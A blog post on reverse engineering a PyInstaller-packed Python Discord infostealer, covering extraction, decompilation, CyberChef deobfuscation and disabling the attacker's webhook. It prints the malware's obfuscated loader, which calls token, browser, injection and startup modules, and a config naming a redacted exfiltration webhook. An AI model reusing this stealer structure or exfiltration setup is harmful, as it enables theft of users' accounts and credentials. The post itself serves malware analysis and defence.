PyInstaller Reverse Engineering

May 22, 2023


In this post, I’ll use pyinstxtractor and pycdc to reverse engineer a Discord infostealer written in Python 3.10 and packed with PyInstaller. I’ll then use CyberChef to further deobfuscate the malware and learn about the wonders of open source. Lastly, I’ll abuse some interesting Discord design decisions to effectively kill the malware.

The story

Recently, a friend’s Discord account was hacked. The account started messaging everyone the link http://redacted.com/redactedmalware, claiming it was a way to earn free Robux or something. Shocker: it’s malware. What kind of malware, exactly? I was curious whether I could reverse engineer it.

I started off by running strings on it, and pretty quickly found some indicators of PyInstaller. If you don’t know what PyInstaller is, it’s a Python package that bundles Python .py scripts, together with a Python interpreter, into a single .exe file. This means the user doesn’t need Python installed to run the program, and it adds a (minor) layer of obfuscation. If we want to view the Python source code, we’ll have to convert the .exe back to the original .py files. How?
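As an aside, the strings check can be approximated in Python. This is a minimal sketch, not what I actually ran: the function names are made up for illustration, the byte sequence is the archive magic that pyinstxtractor looks for, and the extra string markers are my assumption about what typically shows up in PyInstaller builds.

```python
import re

# Archive "cookie" magic that pyinstxtractor searches for in PyInstaller executables.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Return printable ASCII runs of at least min_len bytes, similar to `strings`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def looks_like_pyinstaller(data: bytes) -> bool:
    """Heuristic only: archive magic or PyInstaller-flavoured strings are present."""
    if PYINSTALLER_MAGIC in data:
        return True
    # Assumed markers; real samples may show different strings.
    return any(
        "pyinstaller" in s.lower() or "_MEIPASS" in s for s in ascii_strings(data)
    )
```

Something like looks_like_pyinstaller(open("file.exe", "rb").read()) would then give a quick yes/no without executing anything.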

Part 1: From .exe to .py

Some research brought me to this GitHub repository (pyinstxtractor), which claims to extract the contents of a PyInstaller exe. It works! Download the script and run python3 pyinstxtractor.py file.exe. It’ll output the extracted contents into file.exe_extracted.

We’re not done just yet. As the program says, we only have .pyc files, not .py files. .pyc files hold the compiled bytecode of a .py program, which means we still can’t read the source code directly. Luckily, since this is bytecode (instead of machine code), we can reverse the .pyc files back into something very close to their original .py files with another program!
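To make the "bytecode, not source" point concrete, here is a small sketch that compiles a throwaway script, reads the resulting .pyc back, and disassembles it. The file names are placeholders. It assumes the Python 3.7+ layout (a 16-byte header followed by a marshalled code object) and only works on files compiled by the same interpreter version that runs it, so it would not load the malware’s 3.10 files from a different Python.

```python
import dis
import importlib.util
import marshal
import py_compile
import tempfile
from pathlib import Path


def load_code_from_pyc(pyc_path):
    """Return the code object stored in a .pyc built by the running interpreter."""
    data = Path(pyc_path).read_bytes()
    # Python 3.7+ header: 4-byte magic, 4-byte flags, 8 bytes of mtime/size or hash.
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("compiled by a different Python version")
    return marshal.loads(data[16:])


with tempfile.TemporaryDirectory() as tmp:
    src = Path(tmp) / "hello.py"
    src.write_text("print('hello from bytecode')\n")
    pyc = py_compile.compile(str(src), cfile=str(Path(tmp) / "hello.pyc"))
    code = load_code_from_pyc(pyc)

# Prints bytecode instructions rather than the original source text.
dis.dis(code)
```

The disassembly is readable but tedious, which is why a decompiler is the nicer option.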

Part 1.5: From .pyc to .py

There are some more popular .pyc decompilers out there, like uncompyle6, that you might think would work on these, but they actually don’t. This is because they’re outdated: uncompyle6, for instance, only works up to Python 3.8, and our code is Python 3.10! We need a program supporting more recent versions of Python. Luckily, one exists: pycdc (Decompyle++). There are no binaries we can download, but compiling is pretty easy:

git clone https://github.com/zrax/pycdc
cd pycdc
cmake .
make
./pycdc -h
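If you are not sure which Python version a .pyc was built with (and therefore which decompiler has a chance), the first bytes of the file tell you. The sketch below maps the magic number to a version; the table is deliberately partial and the function name is just for illustration.

```python
import struct

# Magic numbers of final CPython releases (partial table).
MAGIC_TO_VERSION = {
    3394: "3.7",
    3413: "3.8",
    3425: "3.9",
    3439: "3.10",
    3495: "3.11",
    3531: "3.12",
}


def pyc_python_version(header: bytes) -> str:
    """Map the first four bytes of a .pyc file to a Python version string."""
    # The magic is a little-endian 16-bit number followed by b"\r\n".
    if len(header) < 4 or header[2:4] != b"\r\n":
        raise ValueError("not a .pyc header")
    (magic,) = struct.unpack("<H", header[:2])
    return MAGIC_TO_VERSION.get(magic, f"unknown (magic {magic})")
```

Calling pyc_python_version(open("main.pyc", "rb").read(4)) on an extracted file should agree with the version pycdc prints in its header comment.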

We can try it with ./pycdc main.pyc, and it almost works. It clearly starts printing out some of the source code, but it errors out with Unsupported opcode: CALL_FUNCTION_EX.

Part 1.75: Fixing ‘opcode’ errors

Some more googling turned up this savior of a GitHub comment. We have to change a little bit of code, but it’s nothing crazy. Pretty much, every time we encounter an opcode error:

  • Open ASTree.cpp and scroll to around line 1200, where there should be a big set of case statements. (If you are reading this in the far future, it might not be at this line anymore; check the commit history.)
  • Copy your unsupported opcode and add it to the list of case statements. For instance, my unsupported opcode was CALL_FUNCTION_EX, so I added the line case Pyc::CALL_FUNCTION_EX_A:
  • Recompile the program with make, and try the decompilation again. If you get another opcode error, repeat the same thing. Once you add enough, it’ll fully decompile the file, and we now have our source main.py file!
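The repeat-until-it-works loop above gets tedious, so here is a small helper sketch that pulls the opcode names out of saved pycdc output. The function names are hypothetical. The _A suffix in case_label simply mirrors the one example above; I am assuming, not asserting, that it applies to whichever opcode you hit.

```python
import re


def unsupported_opcodes(pycdc_output: str) -> list:
    """Collect names from 'Unsupported opcode: NAME' lines, in first-seen order."""
    seen = []
    for name in re.findall(r"Unsupported opcode: (\w+)", pycdc_output):
        if name not in seen:
            seen.append(name)
    return seen


def case_label(opcode: str) -> str:
    """Build a case line in the style of the CALL_FUNCTION_EX example (assumed suffix)."""
    return f"case Pyc::{opcode}_A:"


output = "def main():\nUnsupported opcode: CALL_FUNCTION_EX\n"
for op in unsupported_opcodes(output):
    print(case_label(op))
```

Check each generated label against the opcode names pycdc actually defines before pasting it into ASTree.cpp.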

Part 2: Reverse Engineering

There’s some obfuscation in the source code itself, but luckily it’s pretty bad. Here’s the main.py file, if you want to try and reverse it before I explain how:

# Source Generated with Decompyle++
# File: main.pyc (Python 3.10)

from components.antidebug import AntiDebug
from components.browsers import Browsers
from components.discordtoken import DiscordToken
from components.injection import Injection
from components.startup import Startup
from components.systeminfo import SystemInfo
from config import __CONFIG__

def main():
Warning: Stack history is not empty!
Warning: block stack is not empty!
    funcs = [
        AntiDebug,
        Browsers,
        DiscordToken,
        Injection,
        Startup,
        SystemInfo]
    for func in funcs:
        if __CONFIG__[func.__name__.lower()]:
            
            try:
                if [
                    iter(__import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\xf3\x0bq4\x05\x00\x02\xef\x01\x19')).decode())] * 3 or int.from_bytes == map((lambda O, i: 511 - int(O) + i)(map, __import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\x03\x00\x00\x00\x00\x01')).decode().join(zip, [
                    iter(__import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\xf3\x0bq4\x05\x00\x02\xef\x01\x19')).decode())] * 3), range(1)), __import__('base64').b64decode(__import__('zlib').decompress(b'x\xdaKr\xcf1Hq\xaf\xc8\x01\x00\x0cB\x02\xd5')).decode(), False, **('signed',)):
                    func(__CONFIG__[__import__('base64').b64decode(__import__('zlib').decompress(b'x\xdaK1\n\xcbLt\xb7,K,\xb7\xb5\x05\x00\x1a,\x03\xff')).decode()])
                else:
                    func()
            finally:
                continue
                if Exception:
                    e = None
                    
                    try:
                        print(__import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\x0b\x8a\xf0\xaaL2\xf6LO\x0c7IO560\xf3\xf4(\xb1\x04\x00D_\x06B')).decode().format(func.__name__, e))
                    finally:
                        e = None
                        del e
                        continue
                        e = None
                        del e
                        if None:
                            if None:
                                continue
                                return None



if __name__ == __import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\x8b0\xb4,\x89\x0c\xcf)\x8d0\xb4\xb0\x05\x00\x19/\x03\xc6')).decode():
    main()
    return None

We see a bunch of the same thing: __import__('base64').b64decode(__import__... ending with a bytestring. We can decode each of these in the Python interpreter, but that’s a little slow. Is it possible to automatically deobfuscate all of this without any risk to my VM?

Part 2.5: Automatic Deobfuscation with CyberChef

Yes! We can use CyberChef to automatically decode all of them for us. A short recipe (unescape the string, inflate it with zlib, then decode it from base64) will deobfuscate a single bytestring. Of course, this is just as slow as the Python interpreter version, given that we still have to copy and paste every one in.

To decode every single one of them at once, we can use the Subsection operation. This operation takes a regex, and the operations that follow it are applied only to the parts of the input that match. For instance, if we set our Subsection regex to match base64 strings and then add a From Base64 step, every match is decoded as base64 while the other parts of the text stay intact.

We’ll do the same with our malware, just with a few more steps: set the regex to match the entire __import__('base64....decode() part, strip everything off but the bytestring, then do the unescape/zlib/base64 like we just did. The following recipe does just that:

Subsection('__import__\\(\'base64\'\\).b64decode\\(__import__\\(\'zlib\'\\).decompress\\(b[\'"].*?[\'"]\\)\\).decode\\(\\)',true,true,false)
Drop_bytes(0,63,false)
Find_/_Replace({'option':'Regex','string':'\'\\)\\).decode\\(\\)'},'',true,false,true,false)
Unescape_string()
Zlib_Inflate(0,0,'Adaptive',false,false)
From_Base64('A-Za-z0-9+/=',true,false)
Merge(true)

This works, and here’s the semi-deobfuscated code. It’s not 100%, but it’s definitely good enough:

from components.antidebug import AntiDebug
from components.browsers import Browsers
from components.discordtoken import DiscordToken
from components.injection import Injection
from components.startup import Startup
from components.systeminfo import SystemInfo
from config import __CONFIG__

def main():
Warning: Stack history is not empty!
Warning: block stack is not empty!
    funcs = [
        AntiDebug,
        Browsers,
        DiscordToken,
        Injection,
        Startup,
        SystemInfo]
    for func in funcs:
        if __CONFIG__[func.__name__.lower()]:
            
            try:
                if [
                    iter(509)] * 3 or int.from_bytes == map((lambda O, i: 511 - int(O) + i)(map, .join(zip, [
                    iter(509)] * 3), range(1)), little, False, **('signed',)):
                    func(__CONFIG__[webhook])
                else:
                    func()
            finally:
                continue
                if Exception:
                    e = None
                    
                    try:
                        print(Error in {}: {}.format(func.__name__, e))
                    finally:
                        e = None
                        del e
                        continue
                        e = None
                        del e
                        if None:
                            if None:
                                continue
                                return None



if __name__ == __main__:
    main()
    return None
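For anyone who prefers to stay offline, the same idea can be sketched in Python. This is my own rough equivalent of the recipe, not something CyberChef produces: it finds each wrapper with a regex, parses only the bytes literal with ast.literal_eval (so none of the malware’s code is executed), and swaps in the decoded text. Unlike the recipe, it inserts the result as a quoted string. The sample line is the webhook lookup from main.py.

```python
import ast
import base64
import re
import zlib

# Matches __import__('base64').b64decode(__import__('zlib').decompress(b'...')).decode()
WRAPPER = re.compile(
    r"__import__\('base64'\)\.b64decode\(__import__\('zlib'\)\.decompress\("
    r"(b(['\"]).*?\2)\)\)\.decode\(\)",
    re.DOTALL,
)


def decode_blob(bytes_literal: str) -> str:
    """Decode one b'...' literal: zlib-inflate, then base64-decode."""
    raw = ast.literal_eval(bytes_literal)  # parses the literal only; runs no code
    return base64.b64decode(zlib.decompress(raw)).decode()


def deobfuscate(source: str) -> str:
    """Replace every wrapper expression with the quoted string it evaluates to."""
    return WRAPPER.sub(lambda m: repr(decode_blob(m.group(1))), source)


sample = (
    "func(__CONFIG__[__import__('base64').b64decode(__import__('zlib')"
    r".decompress(b'x\xdaK1\n\xcbLt\xb7,K,\xb7\xb5\x05\x00\x1a,\x03\xff'))"
    ".decode()])"
)
print(deobfuscate(sample))  # func(__CONFIG__['webhook'])
```

Running deobfuscate over the whole decompiled file text gives roughly the listing above, with the strings properly quoted.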

There are a couple things I immediately notice:

  • A webhook is being loaded from some config script
  • It runs several clearly malicious components like DiscordToken, Startup, Injection, etc.

Let’s start with that DiscordToken part first. Looking at the third import line, it loads DiscordToken from the components.discordtoken module. This means the code being run lives in a different file bundled with the malware, discordtoken.pyc, which we also need to decompile. I found it with find . -name 'discordtoken.pyc' and ran pycdc on it like normal. This file is much, much bigger. Looking at the deobfuscated code, I see something interesting at the bottom: a GitHub link? And a name, ‘Empyrean’? What’s this?

Part 2.7: Open-Source Malware

Just when you thought you’d seen it all. That GitHub link points to an ‘educational purposes only’ infostealer. So, this malware is actually just some script kiddie taking already-existing malware (in Python? really??) and configuring it to send the data to them. There’s not much more reason to deobfuscate this when the source is right here. The wonders of open source, I guess.

Part 3: Stopping the Scam

We aren’t done just yet! Let’s look at that config file I mentioned earlier.

# Source Generated with Decompyle++
# File: config.pyc (Python 3.10)

__CONFIG__ = {
    systeminfo: True,
    startup: True,
    injection: True,
    discordtoken: True,
    browsers: True,
    antidebug: True,
    webhook: https://discordapp.com/api/webhooks/[REDACTEDID]/[REDACTED] }

At the very end we get a juicy webhook. Once the malware finishes running, all your data is sent to this webhook, meaning it pops up in Mister Skid’s Discord server. Interestingly enough (and this is intended behavior), sending an HTTP DELETE request to this endpoint deletes the webhook. Completely unauthenticated, beyond knowing the URL itself!

If you don’t believe me, I made an example webhook, copied its link, and sent a DELETE request to it with curl. Again, clearly no authentication is being done here. And if we go back, it’s gone!

I don’t have the screenshot, but I quickly sent a DELETE request to the malware’s webhook, and now it’s gone. Since the webhook is gone, the program has nowhere to send the stolen data and is essentially dormant on the computer.
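I used curl, but the same request can be sketched with Python’s standard library. The function names and the User-Agent value are placeholders of mine; the header is set explicitly on the assumption that some services reject the default urllib one. On success the endpoint answers with 204 No Content, and a webhook that is already gone raises urllib.error.HTTPError.

```python
import urllib.request


def build_delete_request(webhook_url: str) -> urllib.request.Request:
    """Build (but do not send) an HTTP DELETE request for a webhook URL."""
    return urllib.request.Request(
        webhook_url,
        method="DELETE",
        # Placeholder User-Agent; an assumption, not a documented requirement.
        headers={"User-Agent": "webhook-cleanup-sketch/0.1"},
    )


def delete_webhook(webhook_url: str) -> int:
    """Send the DELETE request and return the HTTP status code."""
    request = build_delete_request(webhook_url)
    with urllib.request.urlopen(request, timeout=10) as response:
        return response.status
```

Calling delete_webhook with the URL from config.pyc is all it takes, so only point it at a webhook you are sure is the malicious one.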
